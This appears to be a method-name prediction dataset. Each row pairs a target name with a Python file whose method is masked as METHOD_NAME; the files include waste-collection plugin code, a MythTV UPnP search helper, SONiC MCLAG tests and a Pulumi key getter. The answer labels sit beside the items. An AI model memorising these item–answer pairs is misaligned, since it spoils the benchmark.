            f"show={self._show}, icon={self._icon}, picture={self._picture}, "
            f"use_dedicated_calendar={self._use_dedicated_calendar}, "
            f"dedicated_calendar_title={self._dedicated_calendar_title}}}"
        )
def filter_function(entry: Collection, customize: Dict[str, Customize]):
    """Return True when *entry* should be kept (its type is not hidden)."""
    c = customize.get(entry.type)
    return True if c is None else c.show
def customize_function(entry: Collection, customize: Dict[str, Customize]):
    """Apply alias/icon/picture overrides from *customize* to *entry* in place."""
    c = customize.get(entry.type)
    if c is None:
        return entry
    if c.alias is not None:
        entry.set_type(c.alias)
    if c.icon is not None:
        entry.set_icon(c.icon)
    if c.picture is not None:
        entry.set_picture(c.picture)
    return entry
class SourceShell:
    """Wraps a waste-collection source plugin with customization and metadata.

    Holds the plugin instance, per-waste-type :class:`Customize` settings,
    display metadata, and the most recently fetched entries.
    """
    def __init__(
        self,
        source,
        customize: Dict[str, Customize],
        title: str,
        description: str,
        url: Optional[str],
        calendar_title: Optional[str],
        unique_id: str,
    ):
        self._source = source
        self._customize = customize
        self._title = title
        self._description = description
        self._url = url
        self._calendar_title = calendar_title
        self._unique_id = unique_id
        # Timestamp of the last successful fetch; None until fetch() succeeds.
        self._refreshtime = None
        self._entries: List[Collection] = []
    @property
    def refreshtime(self):
        return self._refreshtime
    @property
    def title(self):
        return self._title
    @property
    def description(self):
        return self._description
    @property
    def url(self):
        return self._url
    @property
    def calendar_title(self):
        # Falls back to the source title when no explicit calendar title is set.
        return self._calendar_title or self._title
    @property
    def unique_id(self):
        return self._unique_id
    def fetch(self):
        """Fetch data from source."""
        try:
            # fetch returns a list of Collection's
            entries = self._source.fetch()
        except Exception:
            # Any plugin failure is logged and leaves the old entries intact.
            _LOGGER.error(
                f"fetch failed for source {self._title}:\n{traceback.format_exc()}"
            )
            return
        self._refreshtime = datetime.datetime.now()
        # strip whitespaces
        for e in entries:
            e.set_type(e.type.strip())
        # filter hidden entries
        entries = filter(lambda x: filter_function(x, self._customize), entries)
        # customize fetched entries
        entries = map(lambda x: customize_function(x, self._customize), entries)
        self._entries = list(entries)
    def get_dedicated_calendar_types(self):
        """Return set of waste types with a dedicated calendar."""
        types = set()
        for key, customize in self._customize.items():
            if customize.show and customize.METHOD_NAME:
                types.add(key)
        return types
    def get_calendar_title_for_type(self, type):
        """Return calendar title for waste type (used for dedicated calendars)."""
        c = self._customize.get(type)
        if c is not None and c.dedicated_calendar_title:
            return c.dedicated_calendar_title
        return self.get_collection_type_name(type)
    def get_collection_type_name(self, type):
        """Return the display name for a waste type (alias when configured)."""
        c = self._customize.get(type)
        if c is not None and c.alias:
            return c.alias
        return type
    @staticmethod
    def create(
        source_name: str,
        customize: Dict[str, Customize],
        source_args,
        calendar_title: Optional[str] = None,
    ):
        """Import the named source plugin and wrap it in a SourceShell.

        Returns None when the plugin module cannot be imported.
        """
        # load source module
        try:
            source_module = importlib.import_module(
                f"waste_collection_schedule.source.{source_name}"
            )
        except ImportError:
            _LOGGER.error(f"source not found: {source_name}")
            return
        # create source
        source = source_module.Source(**source_args) # type: ignore
        # create source shell
        g = SourceShell(
            source=source,
            customize=customize,
            title=source_module.TITLE, # type: ignore[attr-defined]
            description=source_module.DESCRIPTION, # type: ignore[attr-defined]
            url=source_module.URL, # type: ignore[attr-defined]
            calendar_title=calendar_title,
            unique_id=calc_unique_source_id(source_name, source_args),
        )
        return g
def calc_unique_source_id(source_name, source_args):
    """Build a stable identifier from a source name and its sorted arguments."""
    sorted_args = sorted(source_args.items())
    return f"{source_name}{sorted_args}"
298,468 | search myth fe | # -*- coding: utf-8 -*-
"""Provides tools for UPNP searches"""
from MythTV.exceptions import MythError
from MythTV.logging import MythLog
from time import time
import socket
class MSearch( object ):
    """
    Opens a socket for performing UPNP searches.
    """
    def __init__(self):
        self.log = MythLog('Python M-Search')
        # 239.255.255.250:1900 is the SSDP multicast destination.
        port = 1900
        addr = '239.255.255.250'
        self.dest = (addr, port)
        self.sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM,
                                  socket.IPPROTO_UDP)
        self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        listening = False
        # Try local ports 1900-1909 until one binds; give up after that.
        while listening == False:
            try:
                self.sock.bind(('', port))
                self.addr = (addr, port)
                listening = True
            except socket.error as e:
                if port < 1910:
                    port += 1
                else:
                    raise MythError(MythError.SOCKET, e)
        self.log(MythLog.UPNP|MythLog.SOCKET, MythLog.DEBUG,
                'Port %d opened for UPnP search.' % port)
        # Non-blocking so search() can poll with a deadline.
        self.sock.setblocking(0)
    def __del__(self):
        self.sock.close()
    def search(self, timeout=5.0, filter=None):
        """
        obj.search(timeout=5.0, filter=None) -> response dicts
        IN:
            timeout -- in seconds
            filter -- optional list of ST strings to search for
        OUT:
            response -- a generator returning dicts containing the fields
                        content-length, request, date, usn, location,
                        cache-control, server, ext, st
        """
        self.log(MythLog.UPNP, MythLog.DEBUG, 'running UPnP search')
        sock = self.sock
        # NOTE(review): the HOST header uses self.addr, whose port is the
        # locally-bound one (may be 1901+) rather than 1900 — confirm intended.
        sreq = '\r\n'.join(['M-SEARCH * HTTP/1.1',
                            'HOST: %s:%s' % self.addr,
                            'MAN: "ssdp:discover"',
                            'MX: %d' % timeout,
                            'ST: ssdp:all',''])
        self._runsearch = True
        # spam the request a couple times
        [sock.sendto(sreq.encode('utf-8'), self.dest) for i in range(3)]
        atime = time()+timeout
        while (time()<atime) and self._runsearch:
            try:
                sdata, saddr = sock.recvfrom(2048)
            except socket.error:
                continue #no data, continue
            sdata = sdata.decode('utf-8')
            lines = sdata.split('\n')
            sdict = {'request':lines[0].strip()}
            for line in lines[1:]:
                fields = line.split(':',1)
                if len(fields) == 2:
                    sdict[fields[0].strip().lower()] = fields[1].strip()
            if ('st' not in sdict) or ('location' not in sdict):
                continue
            if filter:
                if sdict['st'] not in filter:
                    continue
            self.log(MythLog.UPNP, MythLog.DEBUG, sdict['st'], sdict['location'])
            yield sdict
    def searchMythBE(self, timeout=5.0):
        """
        obj.searchMythBE(timeout=5.0) -> response dicts
        Filters responses for those from `mythbackend`.
        IN:
            timeout -- in seconds
        OUT:
            response -- a generator returning dicts containing the fields
                        content-length, request, date, usn, location,
                        cache-control, server, ext, st
        """
        location = []
        for res in self.search(timeout, (\
                    'urn:schemas-mythtv-org:device:MasterMediaServer:1',
                    'urn:schemas-mythtv-org:device:SlaveMediaServer:1')):
            if res['location'] not in location:
                location.append(res['location'])
                yield res
    def METHOD_NAME(self, timeout=5.0):
        """
        obj.searchMythFE(timeout=5.0) -> response dicts
        Filters responses for those from `mythfrontend`.
        IN:
            timeout -- in seconds
        OUT:
            response -- a generator returning dicts containing the fields
                        content-length, request, date, usn, location,
                        cache-control, server, ext, st
        """
        location = []
        for res in self.search(timeout, \
                    'urn:schemas-upnp-org:device:MediaRenderer:1'):
            if 'MythTV' not in res['server']:
                continue
            if res['location'] not in location:
                location.append(res['location'])
                yield res
    def terminateSearch(self):
        """
        Prematurely terminate an running search prior
        to the specified timeout.
        """
        self._runsearch = False
|
298,469 | remove mclag domain | # Common file to test all MCLAG related changes
from swsscommon import swsscommon
import time
import re
import json
import pytest
import platform
from distutils.version import StrictVersion
def delete_table_keys(db, table):
    """Remove every entry of *table* in *db*."""
    tbl = swsscommon.Table(db, table)
    for key in tbl.getKeys():
        tbl.delete(key)
# check that a table entry exists with the given key
def check_table_exists(db, table, key):
    """Return (True, []) when *key* exists in *table*, else (False, [msg])."""
    tbl = swsscommon.Table(db, table)
    if key in tbl.getKeys():
        return True, []
    return False, ["The table with desired key %s not found" % key]
# check that no table entry exists with the given key
def check_table_doesnt_exists(db, table, key):
    """Return (True, []) when *key* is absent from *table*, else (False, [msg]).

    Negative counterpart of ``check_table_exists``.
    """
    error_info = [ ]
    tbl = swsscommon.Table(db, table)
    keys = tbl.getKeys()
    if key in keys:
        # Fixed typo in the reported message ("unexcpected" -> "unexpected").
        error_info.append("unexpected: The table with desired key %s is found" % key)
        return False, error_info
    return True, error_info
def create_mclag_domain(dvs, domain_id, source_ip, peer_ip, peer_link):
    """Create an MCLAG domain entry in CONFIG_DB."""
    fvs = swsscommon.FieldValuePairs(
        [("source_ip", source_ip), ("peer_ip", peer_ip), ("peer_link", peer_link)]
    )
    swsscommon.Table(dvs.cdb, "MCLAG_DOMAIN").set(domain_id, fvs)
    time.sleep(1)
def METHOD_NAME(dvs, domain_id):
    """Delete an MCLAG domain entry from CONFIG_DB."""
    swsscommon.Table(dvs.cdb, "MCLAG_DOMAIN")._del(domain_id)
    time.sleep(1)
def add_mclag_domain_field(dvs, domain_id, field, value):
    """Set a single field on an existing MCLAG domain entry."""
    fvs = swsscommon.FieldValuePairs([(field, value)])
    swsscommon.Table(dvs.cdb, "MCLAG_DOMAIN").set(domain_id, fvs)
    time.sleep(1)
def create_mclag_interface(dvs, domain_id, mclag_interface):
    """Attach a PortChannel interface to an MCLAG domain."""
    fvs = swsscommon.FieldValuePairs([("if_type", "PortChannel")])
    swsscommon.Table(dvs.cdb, "MCLAG_INTERFACE").set(
        domain_id + "|" + mclag_interface, fvs
    )
    time.sleep(1)
def remove_mclag_interface(dvs, domain_id, mclag_interface):
    """Detach a PortChannel interface from an MCLAG domain."""
    swsscommon.Table(dvs.cdb, "MCLAG_INTERFACE")._del(
        domain_id + "|" + mclag_interface
    )
    time.sleep(1)
# Test MCLAG Configs
class TestMclagConfig(object):
    """CONFIG_DB-level sanity tests for MCLAG domain and interface tables."""
    CFG_MCLAG_DOMAIN_TABLE = "MCLAG_DOMAIN"
    CFG_MCLAG_INTERFACE_TABLE = "MCLAG_INTERFACE"
    PORTCHANNEL1 = "PortChannel11"
    PORTCHANNEL2 = "PortChannel50"
    PORTCHANNEL3 = "PortChannel51"
    MCLAG_DOMAIN_ID = "4095"
    MCLAG_SRC_IP = "10.5.1.1"
    MCLAG_PEER_IP = "10.5.1.2"
    MCLAG_PEER_LINK = PORTCHANNEL1
    MCLAG_DOMAIN_2 = "111"
    MCLAG_SESS_TMOUT_VALID_LIST = ["3","3600"]
    MCLAG_KA_VALID_LIST = ["1","60"]
    MCLAG_KA_INVALID_LIST = ["0","61"]
    MCLAG_SESS_TMOUT_INVALID_LIST = ["0","3601"]
    MCLAG_INTERFACE1 = PORTCHANNEL2
    MCLAG_INTERFACE2 = PORTCHANNEL3
    # Testcase 1 Verify Configuration of MCLAG Domain with src, peer ip and peer link config gets updated in CONFIG_DB
    @pytest.mark.dev_sanity
    def test_mclag_cfg_domain_add(self, dvs, testlog):
        dvs.setup_db()
        #cleanup existing entries
        delete_table_keys(dvs.cdb, self.CFG_MCLAG_DOMAIN_TABLE)
        delete_table_keys(dvs.cdb, self.CFG_MCLAG_INTERFACE_TABLE)
        create_mclag_domain(dvs, self.MCLAG_DOMAIN_ID, self.MCLAG_SRC_IP, self.MCLAG_PEER_IP, self.MCLAG_PEER_LINK)
        time.sleep(2)
        #check whether domain cfg table contents are same as configured values
        ok,error_info = dvs.all_table_entry_has(dvs.cdb, self.CFG_MCLAG_DOMAIN_TABLE, self.MCLAG_DOMAIN_ID,
                    [
                        ("source_ip",self.MCLAG_SRC_IP),
                        ("peer_ip",self.MCLAG_PEER_IP),
                        ("peer_link",self.MCLAG_PEER_LINK)
                    ]
                )
        assert ok,error_info
    # Testcase 3 Verify Configuration of MCLAG Interface to existing domain
    @pytest.mark.dev_sanity
    def test_mclag_cfg_intf_add(self, dvs, testlog):
        dvs.setup_db()
        create_mclag_interface(dvs, self.MCLAG_DOMAIN_ID, self.MCLAG_INTERFACE1)
        time.sleep(2)
        #check whether mclag interface config is reflected
        key_string = self.MCLAG_DOMAIN_ID + "|" + self.MCLAG_INTERFACE1
        ok,error_info = check_table_exists(dvs.cdb, self.CFG_MCLAG_INTERFACE_TABLE, key_string)
        assert ok,error_info
    # Testcase 4 Verify remove and add mclag interface
    @pytest.mark.dev_sanity
    def test_mclag_cfg_intf_remove_and_add(self, dvs, testlog):
        dvs.setup_db()
        remove_mclag_interface(dvs, self.MCLAG_DOMAIN_ID, self.MCLAG_INTERFACE1)
        time.sleep(2)
        #check whether mclag interface is removed
        key_string = self.MCLAG_DOMAIN_ID + "|" + self.MCLAG_INTERFACE1
        ok,error_info = check_table_doesnt_exists(dvs.cdb, self.CFG_MCLAG_INTERFACE_TABLE, key_string)
        assert ok,error_info
        #add different mclag interface
        create_mclag_interface(dvs, self.MCLAG_DOMAIN_ID, self.MCLAG_INTERFACE2)
        time.sleep(2)
        #check whether new mclag interface is added
        key_string = self.MCLAG_DOMAIN_ID + "|" + self.MCLAG_INTERFACE2
        ok,error_info = check_table_exists(dvs.cdb, self.CFG_MCLAG_INTERFACE_TABLE, key_string)
        assert ok,error_info
    # Testcase 5 Verify Configuration of valid values for session timeout
    @pytest.mark.dev_sanity
    def test_mclag_cfg_session_timeout_valid_values(self, dvs, testlog):
        dvs.setup_db()
        for value in self.MCLAG_SESS_TMOUT_VALID_LIST:
            add_mclag_domain_field(dvs, self.MCLAG_DOMAIN_ID, "session_timeout", value)
            time.sleep(2)
            #check whether domain cfg table contents are same as configured values
            ok,error_info = dvs.all_table_entry_has(dvs.cdb, self.CFG_MCLAG_DOMAIN_TABLE, self.MCLAG_DOMAIN_ID,
                        [
                            ("source_ip",self.MCLAG_SRC_IP),
                            ("peer_ip",self.MCLAG_PEER_IP),
                            ("peer_link",self.MCLAG_PEER_LINK),
                            ("session_timeout",value)
                        ]
                    )
            assert ok,error_info
    # Testcase 6 Verify Configuration of valid values for KA timer
    @pytest.mark.dev_sanity
    def test_mclag_cfg_ka_valid_values(self, dvs, testlog):
        dvs.setup_db()
        for value in self.MCLAG_KA_VALID_LIST:
            add_mclag_domain_field(dvs, self.MCLAG_DOMAIN_ID, "keepalive_interval", value)
            time.sleep(2)
            #check whether domain cfg table contents are same as configured values
            ok,error_info = dvs.all_table_entry_has(dvs.cdb, self.CFG_MCLAG_DOMAIN_TABLE, self.MCLAG_DOMAIN_ID,
                        [
                            ("source_ip",self.MCLAG_SRC_IP),
                            ("peer_ip",self.MCLAG_PEER_IP),
                            ("peer_link",self.MCLAG_PEER_LINK),
                            ("keepalive_interval",value)
                        ]
                    )
            assert ok,error_info
    # Testcase 7 Verify Deletion of MCLAG Domain
    @pytest.mark.dev_sanity
    def test_mclag_cfg_domain_del(self, dvs, testlog):
        dvs.setup_db()
        METHOD_NAME(dvs, self.MCLAG_DOMAIN_ID)
        time.sleep(2)
        #check whether domain cfg table contents are same as configured values
        ok, error_info = check_table_doesnt_exists(dvs.cdb, self.CFG_MCLAG_DOMAIN_TABLE, self.MCLAG_DOMAIN_ID)
        assert ok,error_info
        #make sure mclag interface tables entries are also deleted when mclag domain is deleted
        key_string = self.MCLAG_DOMAIN_ID
        ok,error_info = check_table_doesnt_exists(dvs.cdb, self.CFG_MCLAG_INTERFACE_TABLE, key_string)
        assert ok,error_info
298,470 | secondary key | # coding=utf-8
# *** WARNING: this file was generated by pulumi. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import copy
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
__all__ = [
'ListSignalRKeysResult',
'AwaitableListSignalRKeysResult',
'list_signal_r_keys',
'list_signal_r_keys_output',
]
# NOTE: generated code (see file header) — prefer fixing the generator.
@pulumi.output_type
class ListSignalRKeysResult:
    """
    A class represents the access keys of the resource.
    """
    def __init__(__self__, primary_connection_string=None, primary_key=None, secondary_connection_string=None, METHOD_NAME=None):
        # Each argument is validated as an optional str and stored through
        # pulumi.set so the @pulumi.output_type machinery can expose it.
        if primary_connection_string and not isinstance(primary_connection_string, str):
            raise TypeError("Expected argument 'primary_connection_string' to be a str")
        pulumi.set(__self__, "primary_connection_string", primary_connection_string)
        if primary_key and not isinstance(primary_key, str):
            raise TypeError("Expected argument 'primary_key' to be a str")
        pulumi.set(__self__, "primary_key", primary_key)
        if secondary_connection_string and not isinstance(secondary_connection_string, str):
            raise TypeError("Expected argument 'secondary_connection_string' to be a str")
        pulumi.set(__self__, "secondary_connection_string", secondary_connection_string)
        if METHOD_NAME and not isinstance(METHOD_NAME, str):
            raise TypeError("Expected argument 'secondary_key' to be a str")
        pulumi.set(__self__, "secondary_key", METHOD_NAME)
    @property
    @pulumi.getter(name="primaryConnectionString")
    def primary_connection_string(self) -> Optional[str]:
        """
        Connection string constructed via the primaryKey
        """
        return pulumi.get(self, "primary_connection_string")
    @property
    @pulumi.getter(name="primaryKey")
    def primary_key(self) -> Optional[str]:
        """
        The primary access key.
        """
        return pulumi.get(self, "primary_key")
    @property
    @pulumi.getter(name="secondaryConnectionString")
    def secondary_connection_string(self) -> Optional[str]:
        """
        Connection string constructed via the secondaryKey
        """
        return pulumi.get(self, "secondary_connection_string")
    @property
    @pulumi.getter(name="secondaryKey")
    def METHOD_NAME(self) -> Optional[str]:
        """
        The secondary access key.
        """
        return pulumi.get(self, "secondary_key")
class AwaitableListSignalRKeysResult(ListSignalRKeysResult):
    """Awaitable wrapper that resolves immediately to a plain result object."""
    # pylint: disable=using-constant-test
    def __await__(self):
        # The unreachable `yield` makes __await__ a generator function
        # without ever suspending; the return value is the await result.
        if False:
            yield self
        return ListSignalRKeysResult(
            primary_connection_string=self.primary_connection_string,
            primary_key=self.primary_key,
            secondary_connection_string=self.secondary_connection_string,
            METHOD_NAME=self.METHOD_NAME)
def list_signal_r_keys(resource_group_name: Optional[str] = None,
                       resource_name: Optional[str] = None,
                       opts: Optional[pulumi.InvokeOptions] = None) -> AwaitableListSignalRKeysResult:
    """
    Get the access keys of the resource.
    Azure REST API version: 2023-02-01.
    :param str resource_group_name: The name of the resource group that contains the resource. You can obtain this value from the Azure Resource Manager API or the portal.
    :param str resource_name: The name of the resource.
    """
    __args__ = dict()
    __args__['resourceGroupName'] = resource_group_name
    __args__['resourceName'] = resource_name
    opts = pulumi.InvokeOptions.merge(_utilities.get_invoke_opts_defaults(), opts)
    # Synchronous invoke against the provider; .value is the raw result dict.
    __ret__ = pulumi.runtime.invoke('azure-native:signalrservice:listSignalRKeys', __args__, opts=opts, typ=ListSignalRKeysResult).value
    return AwaitableListSignalRKeysResult(
        primary_connection_string=pulumi.get(__ret__, 'primary_connection_string'),
        primary_key=pulumi.get(__ret__, 'primary_key'),
        secondary_connection_string=pulumi.get(__ret__, 'secondary_connection_string'),
        METHOD_NAME=pulumi.get(__ret__, 'secondary_key'))
@_utilities.lift_output_func(list_signal_r_keys)
def list_signal_r_keys_output(resource_group_name: Optional[pulumi.Input[str]] = None,
                              resource_name: Optional[pulumi.Input[str]] = None,
                              opts: Optional[pulumi.InvokeOptions] = None) -> pulumi.Output[ListSignalRKeysResult]:
    """
    Get the access keys of the resource.
    Azure REST API version: 2023-02-01.
    :param str resource_group_name: The name of the resource group that contains the resource. You can obtain this value from the Azure Resource Manager API or the portal.
    :param str resource_name: The name of the resource.
    """
    ...
298,471 | fix right violations |
from vsg import parser
from vsg import violation
from vsg.vhdlFile import utils
from vsg.rule_group import whitespace
from vsg.rules import utils as rules_utils
class spaces_before_and_after_tokens_when_bounded_by_tokens(whitespace.Rule):
    '''
    Checks for a single space between two tokens.
    Parameters
    ----------
    name : string
        The group the rule belongs to.
    identifier : string
        unique identifier. Usually in the form of 00N.
    lTokens : list of token type pairs
        The tokens to check for a single space between
    '''
    def __init__(self, name, identifier, lTokens, lBetween):
        whitespace.Rule.__init__(self, name=name, identifier=identifier)
        self.lTokens = lTokens
        # Configurable target widths: spaces before/after the token of interest.
        self.spaces_before = 1
        self.configuration.append('spaces_before')
        self.spaces_after = 4
        self.configuration.append('spaces_after')
        self.lBetween = lBetween
        # Number of context tokens captured on each side of the match.
        self.nTokens = 2
    def _get_tokens_of_interest(self, oFile):
        return oFile.get_n_tokens_before_and_after_tokens_bounded_by_tokens(self.nTokens, self.lTokens, self.lBetween)
    def _analyze(self, lToi):
        """Record a violation for each token whose surrounding whitespace is wrong."""
        for oToi in lToi:
            fStartLine = rules_utils.token_list_is_the_beginning_of_a_line(oToi.get_tokens())
            # Narrow to [preceding ws?, token, following ws?].
            myToi = oToi.extract_tokens(1, 3)
            iLine, lTokens = utils.get_toi_parameters(myToi)
            dAction = {}
            # Left-side whitespace is only enforced mid-line.
            if not fStartLine:
                check_spaces_on_left_side(lTokens, dAction, self.spaces_before)
            check_spaces_on_right_side(lTokens, dAction, self.spaces_after)
            if violations_found(dAction):
                sSolution = create_solution_text(dAction, self.spaces_before, self.spaces_after, lTokens)
                oViolation = violation.New(iLine, myToi, sSolution)
                oViolation.set_action(dAction)
                self.add_violation(oViolation)
    def _fix_violation(self, oViolation):
        """Apply the recorded left/right whitespace actions to the token list."""
        lTokens = oViolation.get_tokens()
        dAction = oViolation.get_action()
        fix_left_violations(self, dAction, lTokens)
        METHOD_NAME(self, dAction, lTokens)
        oViolation.set_tokens(lTokens)
def fix_left_violations(self, dAction, lTokens):
    """Apply the recorded left-side whitespace action to *lTokens* in place."""
    if not left_action_exists(dAction):
        return
    action = dAction['left']['action']
    if action == 'adjust':
        lTokens[0].set_value(' ' * self.spaces_before)
    elif action == 'remove':
        del lTokens[0]
    else:
        rules_utils.insert_whitespace(lTokens, self.spaces_before)
def METHOD_NAME(self, dAction, lTokens):
    """Apply the recorded right-side whitespace action to *lTokens* in place."""
    if not right_action_exists(dAction):
        return
    action = dAction['right']['action']
    if action == 'adjust':
        lTokens[-1].set_value(' ' * self.spaces_after)
    else:
        rules_utils.insert_whitespace(lTokens, len(lTokens) - self.spaces_after)
def right_action_exists(dAction):
    """Return True when a right-side whitespace action has been recorded."""
    # `in dAction` replaces the redundant `in list(dAction.keys())` pattern.
    return 'right' in dAction
def left_action_exists(dAction):
    """Return True when a left-side whitespace action has been recorded."""
    return 'left' in dAction
def create_solution_text(dAction, iNumSpacesBefore, iNumSpacesAfter, lTokens):
    """Combine the left- and right-side solution messages into one string."""
    return (
        create_left_solution(dAction, iNumSpacesBefore, lTokens)
        + create_right_solution(dAction, iNumSpacesAfter, lTokens)
    )
def create_left_solution(dAction, iNumSpaces, lTokens):
    """Solution message for the left side, or '' when no action is recorded."""
    if not left_action_exists(dAction):
        return ''
    return create_solution(dAction, 'left', iNumSpaces, lTokens)
def create_right_solution(dAction, iNumSpaces, lTokens):
    """Solution message for the right side, or '' when no action is recorded."""
    if not right_action_exists(dAction):
        return ''
    return create_solution(dAction, 'right', iNumSpaces, lTokens)
def create_solution(dAction, sKey, iNumSpaces, lTokens):
    """Build the human-readable fix description for one recorded action."""
    side = dAction[sKey]['side']
    value = lTokens[1].get_value()
    action = dAction[sKey]['action']
    if action == 'adjust':
        message = f'Change number of spaces {side} *{value}* to {iNumSpaces}. '
    elif action == 'remove':
        message = f'Remove all space(s) {side} *{value}*. '
    else:
        message = f'Add {iNumSpaces} space(s) {side} *{value}*. '
    return message.strip()
def check_spaces_on_left_side(lTokens, dAction, iSpaces):
    """Record whichever left-side whitespace action *lTokens* needs."""
    check_for_adjustment_of_existing_whitespace(lTokens, dAction, iSpaces)
    check_for_removal_of_existing_whitespace(lTokens, dAction, iSpaces)
    check_for_insertion_of_missing_whitespace(lTokens, dAction, iSpaces)
def check_for_adjustment_of_existing_whitespace(lTokens, dAction, iSpaces):
    """Existing leading whitespace with a nonzero target may need adjusting."""
    first = lTokens[0]
    if iSpaces > 0 and isinstance(first, parser.whitespace):
        set_adjust_action('left', first, dAction, iSpaces)
def check_for_removal_of_existing_whitespace(lTokens, dAction, iSpaces):
    """Existing leading whitespace with a zero target must be removed."""
    first = lTokens[0]
    if iSpaces == 0 and isinstance(first, parser.whitespace):
        set_remove_action('left', dAction)
def check_for_insertion_of_missing_whitespace(lTokens, dAction, iSpaces):
    """Missing leading whitespace with a nonzero target must be inserted."""
    first = lTokens[0]
    if iSpaces > 0 and not isinstance(first, parser.whitespace):
        set_insert_action('left', dAction)
def check_spaces_on_right_side(lTokens, dAction, iSpaces):
    """Record the right-side whitespace action *lTokens* needs."""
    last = lTokens[-1]
    if isinstance(last, parser.whitespace):
        set_adjust_action('right', last, dAction, iSpaces)
    else:
        set_insert_action('right', dAction)
def set_adjust_action(sSide, oToken, dAction, iSpaces):
    """Record an 'adjust' action when the current whitespace width differs."""
    if len(oToken.get_value()) != iSpaces:
        dAction[sSide] = {'action': 'adjust'}
        set_side_of_action(sSide, dAction)
def set_remove_action(sSide, dAction):
    """Record a 'remove' action for the given side."""
    dAction[sSide] = {'action': 'remove'}
    set_side_of_action(sSide, dAction)
def set_insert_action(sSide, dAction):
    """Record an 'insert' action for the given side."""
    dAction[sSide] = {'action': 'insert'}
    set_side_of_action(sSide, dAction)
def set_side_of_action(sSide, dAction):
    """Store the prose side label ('before'/'after') on the recorded action."""
    dAction[sSide]['side'] = 'after' if sSide == 'right' else 'before'
def violations_found(dAction):
    """Return True when at least one whitespace action has been recorded."""
    # An empty dict is falsy; no need to materialize the key list.
    return bool(dAction)
298,472 | error | """
Contains all of the logic required to create commands. It should always suffice to import
just this module for a user to create their own commands.
Inherit from :class:`BaseCommand` for regular CLI style commands, or from
:class:`BsbCommand` if you want more freedom in what exactly constitutes a command to the
BSB.
"""
import argparse
from ...exceptions import CommandError
from ...reporting import report
class BaseParser(argparse.ArgumentParser):
    """
    Inherits from argparse.ArgumentParser and overloads the ``error``
    method so that when an error occurs, an exception is raised instead
    of exiting the process.
    """
    def METHOD_NAME(self, message):
        """
        Raise message, instead of exiting.
        :param message: Error message
        :type message: str
        """
        raise CommandError(message)
# True until the first command registers; that command becomes the root `bsb`
# command (see BsbCommand.__init_subclass__).
_is_root = True
class BsbCommand:
    """Minimal command interface; subclasses self-register into the CLI tree.

    Subclassing with ``name=...`` registers the class under *parent*
    (``RootCommand`` by default); ``abstract=True`` skips registration.
    """
    def add_to_parser(self):
        raise NotImplementedError("Commands must implement a `add_to_parser` method.")
    def handler(self, context):
        raise NotImplementedError("Commands must implement a `handler` method.")
    def __init_subclass__(cls, parent=None, abstract=False, name=None, **kwargs):
        global _is_root
        if abstract:
            return
        # Enforce that concrete subclasses actually override both hooks.
        if cls.add_to_parser is BsbCommand.add_to_parser:
            raise NotImplementedError("Commands must implement a `add_to_parser` method.")
        if cls.handler is BsbCommand.handler:
            raise NotImplementedError("Commands must implement a `handler` method.")
        if name is None:
            raise CommandError(f"{cls} must register a name.")
        cls.name = name
        cls._subcommands = []
        # The very first registered command will be the RootCommand for `bsb`
        if _is_root:
            _is_root = False
        else:
            if parent is None:
                parent = RootCommand
            parent._subcommands.append(cls)
class BaseCommand(BsbCommand, abstract=True):
    """Regular CLI-style command: builds argparse subparsers and dispatches.

    Options accumulate down the command tree; more deeply nested (more
    specific) values win when the namespace is reduced in
    ``execute_handler``.
    """
    def add_to_parser(self, parent, context, locals, level):
        """Attach this command (and its subcommands) under *parent*."""
        locals = locals.copy()
        locals.update(self.get_options())
        parser = parent.add_parser(self.name)
        self.add_parser_arguments(parser)
        self.add_parser_options(parser, context, locals, level)
        parser.set_defaults(handler=self.execute_handler)
        self.add_subparsers(parser, context, self._subcommands, locals, level)
        return parser
    def add_subparsers(self, parser, context, commands, locals, level):
        """Recursively attach each subcommand one level deeper."""
        if len(commands) > 0:
            subparsers = parser.add_subparsers()
            for command in commands:
                c = command()
                c._parent = self
                c.add_to_parser(subparsers, context, locals, level + 1)
    def execute_handler(self, namespace, dryrun=False):
        """Reduce the parsed namespace and invoke this command's handler.

        Attribute names are underscore-prefixed per nesting level; for each
        stripped name the value from the deepest level wins.
        """
        reduced = {}
        context = namespace._context
        for k, v in namespace.__dict__.items():
            if v is None or k in ["_context", "handler"]:
                continue
            stripped = k.lstrip("_")
            level = len(k) - len(stripped)
            if stripped not in reduced or level > reduced[stripped][0]:
                reduced[stripped] = (level, v)
        namespace.__dict__ = {k: v[1] for k, v in reduced.items()}
        self.add_locals(context)
        context.set_cli_namespace(namespace)
        report(f"Context: {context}", level=4)
        if not dryrun:
            self.handler(context)
    def add_locals(self, context):
        # Merge our options into the context, preserving those in the context as we're
        # going up the tree towards lower priority and less specific options.
        options = self.get_options()
        options.update(context.options)
        context.options = options
        if hasattr(self, "_parent"):
            self._parent.add_locals(context)
    def add_parser_options(self, parser, context, locals, level):
        """Add context-wide and command-local options to *parser*."""
        merged = {}
        merged.update(context.options)
        merged.update(locals)
        for option in merged.values():
            option.add_to_parser(parser, level)
    def get_options(self):
        raise NotImplementedError(
            "BaseCommands must implement a `get_options(self)` method."
        )
    def add_parser_arguments(self, parser):
        raise NotImplementedError(
            "BaseCommands must implement an `add_parser_arguments(self, parser)` method."
        )
class RootCommand(BaseCommand, name="bsb"):
    """The top-level `bsb` command; all other commands register beneath it."""
    def handler(self, context):
        # Running bare `bsb` does nothing by itself.
        pass
    def get_parser(self, context):
        """Build the full argparse parser for the registered command tree."""
        parser = BaseParser()
        parser.set_defaults(_context=context)
        parser.set_defaults(handler=self.execute_handler)
        locals = self.get_options()
        self.add_parser_options(parser, context, locals, 0)
        self.add_subparsers(parser, context, self._subcommands, locals, 0)
        return parser
    def get_options(self):
        return {}
def load_root_command():
    """Discover command plugins and return the fully-populated root command."""
    from ...plugins import discover
    # Simply discovering the plugin modules should append them to their parent command
    # class using the `__init_subclass__` function.
    discover("commands")
    return RootCommand()
298,473 | quark | #!/usr/bin/env python3
import gpt as g
import numpy as np
import os, sys
rng = g.random("test")
# cold start
U = g.qcd.gauge.unit(g.grid([24, 24, 24, 48], g.double))
latest_it = None
it0 = 0
dst = g.default.get("--root", None)
N = 4000
# Scan for the most recent saved gauge configuration to resume from.
for it in range(N):
    if os.path.exists(f"{dst}/ckpoint_lat.{it}"):
        latest_it = it
if latest_it is not None:
    # Resume: load the latest gauge field and re-seed the RNG deterministically
